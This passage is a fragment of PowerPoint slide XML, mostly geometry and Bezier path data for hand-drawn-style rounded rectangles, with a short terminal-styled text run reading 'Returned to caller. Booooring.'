                      <a:gd name="connsiteX18" fmla="*/ 5445999 w 6935263"/>
                      <a:gd name="connsiteY18" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX19" fmla="*/ 4734020 w 6935263"/>
                      <a:gd name="connsiteY19" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX20" fmla="*/ 4214626 w 6935263"/>
                      <a:gd name="connsiteY20" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX21" fmla="*/ 3759426 w 6935263"/>
                      <a:gd name="connsiteY21" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX22" fmla="*/ 3175837 w 6935263"/>
                      <a:gd name="connsiteY22" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX23" fmla="*/ 2528053 w 6935263"/>
                      <a:gd name="connsiteY23" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX24" fmla="*/ 1816074 w 6935263"/>
                      <a:gd name="connsiteY24" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX25" fmla="*/ 1168289 w 6935263"/>
                      <a:gd name="connsiteY25" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX26" fmla="*/ 257890 w 6935263"/>
                      <a:gd name="connsiteY26" fmla="*/ 1547312 h 1547312"/>
                      <a:gd name="connsiteX27" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY27" fmla="*/ 1289422 h 1547312"/>
                      <a:gd name="connsiteX28" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY28" fmla="*/ 773656 h 1547312"/>
                      <a:gd name="connsiteX29" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY29" fmla="*/ 257890 h 154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35263" h="1547312" fill="none" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="257890"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="30250" y="143512"/>
                          <a:pt x="137264" y="-13036"/>
                          <a:pt x="257890" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="407126" y="-5607"/>
                          <a:pt x="629064" y="11091"/>
                          <a:pt x="841479" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1053894" y="-11091"/>
                          <a:pt x="1207174" y="46126"/>
                          <a:pt x="1489264" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1771354" y="-46126"/>
                          <a:pt x="1749938" y="37887"/>
                          <a:pt x="1944463" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2138988" y="-37887"/>
                          <a:pt x="2219125" y="6704"/>
                          <a:pt x="2335468" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2451811" y="-6704"/>
                          <a:pt x="2683103" y="2850"/>
                          <a:pt x="2790668" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2898233" y="-2850"/>
                          <a:pt x="3111207" y="8730"/>
                          <a:pt x="3310062" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3508917" y="-8730"/>
                          <a:pt x="3742663" y="53"/>
                          <a:pt x="3893652" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4044641" y="-53"/>
                          <a:pt x="4248279" y="15452"/>
                          <a:pt x="4348851" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4449423" y="-15452"/>
                          <a:pt x="4758001" y="48006"/>
                          <a:pt x="5060830" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5363659" y="-48006"/>
                          <a:pt x="5396680" y="67988"/>
                          <a:pt x="5644420" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5892160" y="-67988"/>
                          <a:pt x="6308442" y="30952"/>
                          <a:pt x="6677373" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6813188" y="-7567"/>
                          <a:pt x="6944051" y="105953"/>
                          <a:pt x="6935263" y="257890"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6972344" y="488435"/>
                          <a:pt x="6872917" y="646316"/>
                          <a:pt x="6935263" y="794287"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6997609" y="942258"/>
                          <a:pt x="6918393" y="1137994"/>
                          <a:pt x="6935263" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6936199" y="1422386"/>
                          <a:pt x="6821860" y="1541228"/>
                          <a:pt x="6677373" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6445607" y="1548732"/>
                          <a:pt x="6232649" y="1483025"/>
                          <a:pt x="6029589" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5826529" y="1611599"/>
                          <a:pt x="5594342" y="1487007"/>
                          <a:pt x="5445999" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5297656" y="1607617"/>
                          <a:pt x="4918240" y="1526345"/>
                          <a:pt x="4734020" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4549800" y="1568279"/>
                          <a:pt x="4369704" y="1512297"/>
                          <a:pt x="4214626" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4059548" y="1582327"/>
                          <a:pt x="3868960" y="1544839"/>
                          <a:pt x="3759426" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3649892" y="1549785"/>
                          <a:pt x="3426640" y="1484319"/>
                          <a:pt x="3175837" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2925034" y="1610305"/>
                          <a:pt x="2666536" y="1472688"/>
                          <a:pt x="2528053" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2389570" y="1621936"/>
                          <a:pt x="1993541" y="1504920"/>
                          <a:pt x="1816074" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1638607" y="1589704"/>
                          <a:pt x="1329682" y="1509881"/>
                          <a:pt x="1168289" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1006897" y="1584743"/>
                          <a:pt x="558609" y="1474495"/>
                          <a:pt x="257890" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99138" y="1545753"/>
                          <a:pt x="-35206" y="1447272"/>
                          <a:pt x="0" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-30148" y="1125298"/>
                          <a:pt x="61366" y="895113"/>
                          <a:pt x="0" y="773656"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-61366" y="652199"/>
                          <a:pt x="34609" y="485588"/>
                          <a:pt x="0" y="257890"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                      <a:path w="6935263" h="1547312" stroke="0" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="257890"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="-9077" y="109862"/>
                          <a:pt x="78820" y="13752"/>
                          <a:pt x="257890" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="516840" y="-51645"/>
                          <a:pt x="723035" y="4619"/>
                          <a:pt x="969869" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1216703" y="-4619"/>
                          <a:pt x="1350541" y="19209"/>
                          <a:pt x="1489264" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1627987" y="-19209"/>
                          <a:pt x="1754942" y="6496"/>
                          <a:pt x="1944463" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2133984" y="-6496"/>
                          <a:pt x="2322589" y="25800"/>
                          <a:pt x="2592247" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2861905" y="-25800"/>
                          <a:pt x="2870370" y="28988"/>
                          <a:pt x="3111642" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3352915" y="-28988"/>
                          <a:pt x="3481574" y="78120"/>
                          <a:pt x="3823621" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4165668" y="-78120"/>
                          <a:pt x="4184860" y="13511"/>
                          <a:pt x="4278821" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4372782" y="-13511"/>
                          <a:pt x="4759050" y="3998"/>
                          <a:pt x="4990800" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5222550" y="-3998"/>
                          <a:pt x="5209571" y="45993"/>
                          <a:pt x="5381805" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5554039" y="-45993"/>
                          <a:pt x="5824627" y="41485"/>
                          <a:pt x="5965394" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6106161" y="-41485"/>
                          <a:pt x="6325924" y="82700"/>
                          <a:pt x="6677373" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6848279" y="-28140"/>
                          <a:pt x="6943826" y="109940"/>
                          <a:pt x="6935263" y="257890"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6945411" y="458488"/>
                          <a:pt x="6892757" y="526992"/>
                          <a:pt x="6935263" y="773656"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6977769" y="1020320"/>
                          <a:pt x="6933495" y="1153095"/>
                          <a:pt x="6935263" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6925399" y="1422558"/>
                          <a:pt x="6799164" y="1516460"/>
                          <a:pt x="6677373" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6511348" y="1585305"/>
                          <a:pt x="6253414" y="1529162"/>
                          <a:pt x="6029589" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5805764" y="1565462"/>
                          <a:pt x="5737688" y="1540921"/>
                          <a:pt x="5638584" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5539480" y="1553703"/>
                          <a:pt x="5379740" y="1502689"/>
                          <a:pt x="5183384" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4987028" y="1591935"/>
                          <a:pt x="4789741" y="1499240"/>
                          <a:pt x="4471405" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4153069" y="1595384"/>
                          <a:pt x="4080245" y="1480640"/>
                          <a:pt x="3887816" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3695387" y="1613984"/>
                          <a:pt x="3607201" y="1502279"/>
                          <a:pt x="3432616" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3258031" y="1592345"/>
                          <a:pt x="3093101" y="1534870"/>
                          <a:pt x="2849027" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2604953" y="1559754"/>
                          <a:pt x="2584528" y="1530696"/>
                          <a:pt x="2458022" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2331517" y="1563928"/>
                          <a:pt x="2182191" y="1544577"/>
                          <a:pt x="2067017" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1951844" y="1550047"/>
                          <a:pt x="1662525" y="1541733"/>
                          <a:pt x="1483428" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1304331" y="1552891"/>
                          <a:pt x="1172561" y="1544179"/>
                          <a:pt x="1028228" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="883895" y="1550445"/>
                          <a:pt x="453687" y="1512448"/>
                          <a:pt x="257890" y="1547312"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="128060" y="1544548"/>
                          <a:pt x="17251" y="1446063"/>
                          <a:pt x="0" y="1289422"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-19216" y="1031975"/>
                          <a:pt x="14379" y="930774"/>
                          <a:pt x="0" y="753025"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-14379" y="575276"/>
                          <a:pt x="16670" y="391871"/>
                          <a:pt x="0" y="25789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Returned to caller. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Booooring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA08D230-2021-9247-A1A1-C6477637E552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142968" y="4736109"/>
            <a:ext cx="6935263" cy="1985366"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1219033472">
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="connsiteX0" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY0" fmla="*/ 330901 h 1985366"/>
                      <a:gd name="connsiteX1" fmla="*/ 330901 w 6935263"/>
                      <a:gd name="connsiteY1" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX2" fmla="*/ 775746 w 6935263"/>
                      <a:gd name="connsiteY2" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX3" fmla="*/ 1157857 w 6935263"/>
                      <a:gd name="connsiteY3" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX4" fmla="*/ 1602703 w 6935263"/>
                      <a:gd name="connsiteY4" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX5" fmla="*/ 2110283 w 6935263"/>
                      <a:gd name="connsiteY5" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX6" fmla="*/ 2680597 w 6935263"/>
                      <a:gd name="connsiteY6" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX7" fmla="*/ 3125443 w 6935263"/>
                      <a:gd name="connsiteY7" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX8" fmla="*/ 3821227 w 6935263"/>
                      <a:gd name="connsiteY8" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX9" fmla="*/ 4391541 w 6935263"/>
                      <a:gd name="connsiteY9" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX10" fmla="*/ 5087325 w 6935263"/>
                      <a:gd name="connsiteY10" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX11" fmla="*/ 5720374 w 6935263"/>
                      <a:gd name="connsiteY11" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX12" fmla="*/ 6604362 w 6935263"/>
                      <a:gd name="connsiteY12" fmla="*/ 0 h 1985366"/>
                      <a:gd name="connsiteX13" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY13" fmla="*/ 330901 h 1985366"/>
                      <a:gd name="connsiteX14" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY14" fmla="*/ 758853 h 1985366"/>
                      <a:gd name="connsiteX15" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY15" fmla="*/ 1160334 h 1985366"/>
                      <a:gd name="connsiteX16" fmla="*/ 6935263 w 6935263"/>
                      <a:gd name="connsiteY16" fmla="*/ 1654465 h 1985366"/>
                      <a:gd name="connsiteX17" fmla="*/ 6604362 w 6935263"/>
                      <a:gd name="connsiteY17" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX18" fmla="*/ 5908578 w 6935263"/>
                      <a:gd name="connsiteY18" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX19" fmla="*/ 5463733 w 6935263"/>
                      <a:gd name="connsiteY19" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX20" fmla="*/ 4893418 w 6935263"/>
                      <a:gd name="connsiteY20" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX21" fmla="*/ 4260369 w 6935263"/>
                      <a:gd name="connsiteY21" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX22" fmla="*/ 3564585 w 6935263"/>
                      <a:gd name="connsiteY22" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX23" fmla="*/ 2931536 w 6935263"/>
                      <a:gd name="connsiteY23" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX24" fmla="*/ 2235752 w 6935263"/>
                      <a:gd name="connsiteY24" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX25" fmla="*/ 1602703 w 6935263"/>
                      <a:gd name="connsiteY25" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX26" fmla="*/ 1157857 w 6935263"/>
                      <a:gd name="connsiteY26" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX27" fmla="*/ 330901 w 6935263"/>
                      <a:gd name="connsiteY27" fmla="*/ 1985366 h 1985366"/>
                      <a:gd name="connsiteX28" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY28" fmla="*/ 1654465 h 1985366"/>
                      <a:gd name="connsiteX29" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY29" fmla="*/ 1200041 h 1985366"/>
                      <a:gd name="connsiteX30" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY30" fmla="*/ 785325 h 1985366"/>
                      <a:gd name="connsiteX31" fmla="*/ 0 w 6935263"/>
                      <a:gd name="connsiteY31" fmla="*/ 330901 h 198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35263" h="1985366" fill="none" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="330901"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="3476" y="132976"/>
                          <a:pt x="131627" y="-532"/>
                          <a:pt x="330901" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="464491" y="-46664"/>
                          <a:pt x="608229" y="48684"/>
                          <a:pt x="775746" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="943264" y="-48684"/>
                          <a:pt x="1020233" y="31838"/>
                          <a:pt x="1157857" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1295481" y="-31838"/>
                          <a:pt x="1393496" y="14476"/>
                          <a:pt x="1602703" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1811910" y="-14476"/>
                          <a:pt x="1992314" y="48941"/>
                          <a:pt x="2110283" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2228252" y="-48941"/>
                          <a:pt x="2499887" y="50706"/>
                          <a:pt x="2680597" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2861307" y="-50706"/>
                          <a:pt x="2929604" y="49464"/>
                          <a:pt x="3125443" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3321282" y="-49464"/>
                          <a:pt x="3531058" y="24405"/>
                          <a:pt x="3821227" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4111396" y="-24405"/>
                          <a:pt x="4215765" y="15266"/>
                          <a:pt x="4391541" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4567317" y="-15266"/>
                          <a:pt x="4896808" y="24543"/>
                          <a:pt x="5087325" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5277842" y="-24543"/>
                          <a:pt x="5441526" y="27639"/>
                          <a:pt x="5720374" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5999222" y="-27639"/>
                          <a:pt x="6377898" y="27360"/>
                          <a:pt x="6604362" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6811769" y="4227"/>
                          <a:pt x="6903459" y="159785"/>
                          <a:pt x="6935263" y="330901"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6947249" y="469426"/>
                          <a:pt x="6929529" y="637266"/>
                          <a:pt x="6935263" y="758853"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6940997" y="880440"/>
                          <a:pt x="6888838" y="1042861"/>
                          <a:pt x="6935263" y="1160334"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6981688" y="1277807"/>
                          <a:pt x="6920201" y="1462150"/>
                          <a:pt x="6935263" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6946448" y="1797930"/>
                          <a:pt x="6769918" y="1954799"/>
                          <a:pt x="6604362" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6355689" y="2034516"/>
                          <a:pt x="6141624" y="1982336"/>
                          <a:pt x="5908578" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5675532" y="1988396"/>
                          <a:pt x="5585775" y="1961469"/>
                          <a:pt x="5463733" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5341691" y="2009263"/>
                          <a:pt x="5045651" y="1982000"/>
                          <a:pt x="4893418" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4741185" y="1988732"/>
                          <a:pt x="4528569" y="1964423"/>
                          <a:pt x="4260369" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3992169" y="2006309"/>
                          <a:pt x="3740173" y="1919037"/>
                          <a:pt x="3564585" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3388997" y="2051695"/>
                          <a:pt x="3214625" y="1933243"/>
                          <a:pt x="2931536" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2648447" y="2037489"/>
                          <a:pt x="2418025" y="1962459"/>
                          <a:pt x="2235752" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2053479" y="2008273"/>
                          <a:pt x="1878492" y="1938500"/>
                          <a:pt x="1602703" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1326914" y="2032232"/>
                          <a:pt x="1324345" y="1940296"/>
                          <a:pt x="1157857" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="991369" y="2030436"/>
                          <a:pt x="663276" y="1915413"/>
                          <a:pt x="330901" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="160873" y="1987326"/>
                          <a:pt x="26551" y="1877953"/>
                          <a:pt x="0" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-53031" y="1550113"/>
                          <a:pt x="26345" y="1295024"/>
                          <a:pt x="0" y="1200041"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-26345" y="1105058"/>
                          <a:pt x="2066" y="879660"/>
                          <a:pt x="0" y="785325"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-2066" y="690990"/>
                          <a:pt x="31159" y="533409"/>
                          <a:pt x="0" y="330901"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                      <a:path w="6935263" h="1985366" stroke="0" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="330901"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="-21300" y="135010"/>
                          <a:pt x="104468" y="16394"/>
                          <a:pt x="330901" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="666146" y="-49002"/>
                          <a:pt x="718466" y="57821"/>
                          <a:pt x="1026685" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1334904" y="-57821"/>
                          <a:pt x="1422046" y="27094"/>
                          <a:pt x="1534265" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1646484" y="-27094"/>
                          <a:pt x="1770141" y="4968"/>
                          <a:pt x="1979110" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2188080" y="-4968"/>
                          <a:pt x="2424764" y="51257"/>
                          <a:pt x="2612160" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2799556" y="-51257"/>
                          <a:pt x="2934266" y="17839"/>
                          <a:pt x="3119740" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3305214" y="-17839"/>
                          <a:pt x="3613300" y="56856"/>
                          <a:pt x="3815523" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4017746" y="-56856"/>
                          <a:pt x="4082288" y="11836"/>
                          <a:pt x="4260369" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4438450" y="-11836"/>
                          <a:pt x="4670901" y="69038"/>
                          <a:pt x="4956153" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5241405" y="-69038"/>
                          <a:pt x="5148681" y="272"/>
                          <a:pt x="5338264" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5527847" y="-272"/>
                          <a:pt x="5700670" y="9430"/>
                          <a:pt x="5908578" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6116486" y="-9430"/>
                          <a:pt x="6349684" y="52316"/>
                          <a:pt x="6604362" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6817994" y="-30515"/>
                          <a:pt x="6976625" y="121478"/>
                          <a:pt x="6935263" y="330901"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6963233" y="517036"/>
                          <a:pt x="6925117" y="555805"/>
                          <a:pt x="6935263" y="772089"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6945409" y="988373"/>
                          <a:pt x="6932057" y="1031670"/>
                          <a:pt x="6935263" y="1186806"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6938469" y="1341942"/>
                          <a:pt x="6881326" y="1553025"/>
                          <a:pt x="6935263" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6922445" y="1811088"/>
                          <a:pt x="6790431" y="1940495"/>
                          <a:pt x="6604362" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6397626" y="2010181"/>
                          <a:pt x="6225864" y="1933133"/>
                          <a:pt x="5971313" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5716762" y="2037599"/>
                          <a:pt x="5670373" y="1941892"/>
                          <a:pt x="5526467" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5382561" y="2028840"/>
                          <a:pt x="5097762" y="1911954"/>
                          <a:pt x="4830683" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4563604" y="2058778"/>
                          <a:pt x="4393649" y="1934127"/>
                          <a:pt x="4260369" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4127089" y="2036605"/>
                          <a:pt x="3986644" y="1944342"/>
                          <a:pt x="3815523" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3644402" y="2026390"/>
                          <a:pt x="3482736" y="1948031"/>
                          <a:pt x="3245209" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3007682" y="2022701"/>
                          <a:pt x="2995311" y="1978616"/>
